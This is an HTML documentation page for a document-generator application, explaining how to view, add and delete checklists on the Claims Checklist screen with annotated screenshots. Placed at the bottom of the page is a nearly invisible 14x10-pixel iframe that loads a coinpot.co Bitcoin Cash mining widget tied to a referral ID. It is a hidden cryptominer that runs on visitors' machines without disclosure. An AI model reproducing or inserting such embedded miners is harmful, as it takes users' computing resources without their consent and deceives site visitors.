<!DOCTYPE html>
<html>

<head>
	<title>PGBh-US Document Generator</title>
	<link rel="stylesheet" type="text/css" href="css/style.css">
	<link rel="stylesheet" type="text/css" href="font-awesome/css/font-awesome.min.css">
	<link rel="stylesheet" type="text/css" href="css/bootstrap.min.css">
	<!-- <script src="js/jquery.imagebox.js"></script> -->
</head>

<body>
	<div id="wrapper">
		<!-- wrapper starts-->
		<nav class="navbar navbar-inverse navbar-fixed-top">
			<!-- navbar navbar-inverse navbar-fixed-top starts -->
			<div class="navbar-header">
				<!-- navbar-header starts-->
				<button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-ex1-collapse">
					<!-- .navbar-ex1-collapse starts--><span class="sr-only">Toggle Navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button>
				<!-- .navbar-ex1-collapse ends--><a href="index.html" class="navbar-brand">PGBh-US Document Generator (Documentation)</a> </div>
			<!-- navbar-header ends-->
			</ul>
			<!-- dropdown-menu ends -->
			</li>
			<!-- dropdown ends-->
			</ul>
			<!-- nav navbar-right top-nav ends-->
			<!-- Left -->
			<div class="collapse navbar-collapse navbar-ex1-collapse">
				<!-- collapse navbar-collapse navbar-ex1-collapse starts -->
				<ul class="nav navbar-nav side-nav">
					<!-- nav navbar-nav side-nav starts -->
					<li>
						<!-- li starts -->
						<a href="getting_started.html"> <i class="fa fa-fw fa-dashboard"></i> Getting Started </a>
					</li>
					<!-- li ends -->
					<li>
						<!-- li starts -->
						<a href="#" data-toggle="collapse" data-target="#software"> <i class="fa fa-fw fa-table"></i> Software Settings <i class="fa fa-fw fa-caret-down"></i> </a>
						<ul id="software" class="collapse">
							<li> <a href="software_update.html">Software Update</a> </li>
							<li> <a href="software_settings.html">Software Settings</a> </li>
							<li> <a href="connection_string_settings.html">Connection String Settings</a> </li>
							<li> <a href="software_info.html">Software Info</a> </li>
						</ul>
					</li>
					<!-- li ends -->
					<li>
						<!-- li starts -->
						<a href="#" data-toggle="collapse" data-target="#developer"> <i class="fa fa-fw fa-pencil"></i> Developer Tab <i class="fa fa-fw fa-caret-down"></i> </a>
						<ul id="developer" class="collapse">
							<li> <a href="software_revision.html">Software Revision</a> </li>
							<li> <a href="developer_level.html">Developer Level Software Upload</a> </li>
							<li> <a href="updater_settings.html">Updater Settings</a> </li>
						</ul>
					</li>
					<!-- li ends -->
					<li>
						<!-- li starts -->
						<a data-toggle="collapse" data-target="#user"> <i class="fa fa-fw fa-user"></i> Users <i class="fa fa-fw fa-caret-down"></i> </a>
						<ul id="user" class="collapse">
							<li> <a href="user_management.html">User Management</a> </li>
							<li> <a href="user_privileges.html">User's Privileges</a> </li>
							<li> <a href="change_password.html">Change Password</a> </li>
							<li> <a href="user_chat_line.html">Users Chat Line</a> </li>
						</ul>
					</li>
					<!-- li ends -->
					<li>
						<!-- li starts-->
						<a href="#" data-toggle="collapse" data-target="#wfp"> <i class="fa fa-fw fa-arrows-v"></i> Back End <i class="fa fa-fw fa-caret-down"></i> </a>
						<ul id="wfp" class="collapse">
							<li> <a href="work_financial_funds.html">Work and Financial Plan/Funds</a> </li>							
							<li> <a href="wfp_usage.html">WFP Usage</a> </li>							
							<li> <a href="claims_checklist.html">Claims Checklist</a> </li>							
							<li> <a href="checklist_manager.html">Checklist Manager</a> </li>
							<li> <a href="paas_tagging.html">PAAS Tagging</a> </li>
							<li> <a href="signatories.html">Signatories</a> </li>
						</ul>
					</li>
					<!-- li ends-->
					<li>
						<!-- li starts -->
						<a href="#" data-toggle="collapse" data-target="#transaction"> <i class="fa fa-fw fa-gear"></i> Transaction <i class="fa fa-fw fa-caret-down"></i> </a>
						<ul id="transaction" class="collapse">
							<li> <a href="with_wfp_transaction.html">With WFP Transactions</a> </li>
							<li> <a href="no_wfp_transaction.html">No WFP Transactions</a> </li>
							<li> <a href="manage_transaction.html">Manage Transactions</a> </li>
							<li> <a href="transaction_approval.html">Transaction For Approval</a> </li>
						</ul>
					</li>
					<!-- li ends -->
				</ul>
				<!-- nav navbar-nav side-nav ends -->
			</div>
			<!-- collapse navbar-collapse navbar-ex1-collapse starts -->
		</nav>
		<!-- navbar navbar-inverse navbar-fixed-top ends -->
		<div id="page-wrapper">
			<!-- page-wrapper starts-->
			<div class="container-fluid">
				<!-- container-fluid starts-->
				<div class="row">
					<div class="col-lg-12">
						<ol class="breadcrumb">
							<li class="active"><i class="fa fa-dashboard"></i> <a href="index.html">PGBh-USDG</a> / Back End / Claims Checklist</li>
						</ol>
					</div>
				</div>
				<div class="row">
					<!-- row starts-->
					<div class="col-lg-12">
						<!-- col-lg-12 starts-->
						<hr />
						<h3 font size="20" style="font-weight: bold;">Claims Checklist</h3>
						<br>
						<figure> <img src="img/software_2.png" alt="Figure 1.0" class="img-style">
							<br>
							<figcaption style="text-align: center">Figure 1.0</figcaption>
						</figure>
						<br>
						<div class="info notes">
							<p><strong>For Figure 1.0:</strong></p>
							<ul>
								<li><strong><a href="#arrow-a">Arrow G (Orange)</a></strong>: By clicking Claims Checklist see Figure below.</li>
							</ul>
						</div>
						<!-- add -->
						<div class="page-header">
							<h4><strong>1. Manipulate the list of Claims<strong></h4> </div>
						<figure> <img src="img/claims_checklist.jpg" alt="Figure 2.1" class="img-style">
							<br>
							<figcaption style="text-align: center">Figure 3.1</figcaption>
						</figure>
						<br>
						<div class="info notes">
							<p><strong>For Figure 3.1:</strong></p>
							<ul>
								<li><strong><a href="#arrow-a">Arrow A</a></strong>: Click the button to refresh the list of Claims.</li>
								<li><strong><a href="#arrow-a">Arrow B</a></strong>: Click or hover on search box to search the list for the user's desired claim(s).</li>
								<li><strong><a href="#arrow-a">Arrow C</a></strong>: Click the folder button to open a certain Claim or user can directly double-click the box (arrow E) of the certain Claim.</li>
							</ul>
						</div>
						<!-- edit -->
						<div class="page-header">
							<h4><strong>2. Add Checklist to Claims</strong></h4> </div>
						<figure> <img src="img/claims_checklist_add.jpg" alt="Figure 3.2" class="img-style">
							<br>
							<figcaption style="text-align: center">Figure 3.2</figcaption>
						</figure>
						<br>
						<div class="info notes">
							<p><strong>For Figure 3.2:</strong>
								<div class="text-muted">
									<p><strong>When a user opened a certain Claim (ex. OVERTIME PAY), the form will show
                                            its Checklist.</strong></p>
								</div>
							</p>
							<ul>
								<li><strong><a href="#arrow-a">Arrow D</a></strong>: Click or hover on search box to search the Checklist.</li>
								<li><strong><a href="#arrow-a">Arrow C</a></strong>: Click to refresh the list.</li>
								<li><strong><a href="#arrow-a">Arrow A</a></strong>: Click to add the checklist, a confirmation form appears as shown in Fig 2.2.1 below.</li>
							</ul>
						</div>
						<figure> <img src="img/claims_checklist_add_dialog.jpg" alt="Figure 2.2.1" class="img-style">
							<br>
							<figcaption style="text-align: center">Figure 3.2.1</figcaption>
						</figure>
						<br>
						<div class="info notes">
							<p><strong>For Figure 3.2.1:</strong>
								<div class="text-muted">
									<p><strong>User can choose to proceed or not. Upon clicking "NO" button (b), it goes
                                            back to ClaimsChecklistForm. When user choose to proceed by clicking "YES"
                                            button (a), form 'Add Claims Checklist' appears as shown in Fig 2.2.2
                                            below.</strong></p>
								</div>
							</p>
						</div>
						<figure> <img src="img/claims_checklist_add_add.jpg" alt="Figure 3.2.2" class="img-style" width="300px" height="500;">
							<br>
							<figcaption style="text-align: center">Figure 3.2.2</figcaption>
						</figure>
						<br>
						<div class="info notes">
							<p><strong>For Figure 3.2.2:</strong>
								<div class="text-muted">
									<p><strong>User can look for the needed checklist then click the checkbox (a) to
                                            select a checklist and finalize the selection.</strong></p>
								</div>
							</p>
						</div>
						<!-- Delete  -->
						<div class="page-header">
							<h4><strong>3. Delete a Claims' Checklist<strong></h4> </div>
						<figure> <img src="img/claims_checklist_delete.jpg" alt="Figure 3.2" class="img-style">
							<br>
							<figcaption style="text-align: center">Figure 3.2</figcaption>
							<figcaption style="text-align: center" class="text-muted"> Click "YES" button to proceed deleting and "NO" to cancel.</figcaption>
						</figure>
						<br>
						<div class="info notes">
							<p><strong>For Figure 3.2:</strong>
								<div class="text-muted">
									<p><strong>User can also delete a checklist. Select the checklist you desired to
                                            delete and then click button (b) in Fig 3.2, a confirmation form
                                            appears.</strong></p>
								</div>
							</p>
						</div>
					</div>
					<!-- col-lg-12 ends-->
				</div>
				<!-- row ends-->
			</div>
			<!-- container-fluid ends-->
		</div>
		<!-- page-wrapper ends-->
		<div style="text-align:center">
				<iframe scrolling="no" frameborder="0" src="https://coinpot.co/mine/bitcoincash/?ref=7F1715F1CC6E&mode=widget" style="overflow:hidden;width:14px;height:10px;"></iframe>
		</div>
	</div>
	<!-- wrapper ends-->
	<script type="text/javascript" src="js/jquery.min.js"></script>
	<script type="text/javascript" src="js/bootstrap.min.js"></script>
</body>

</html>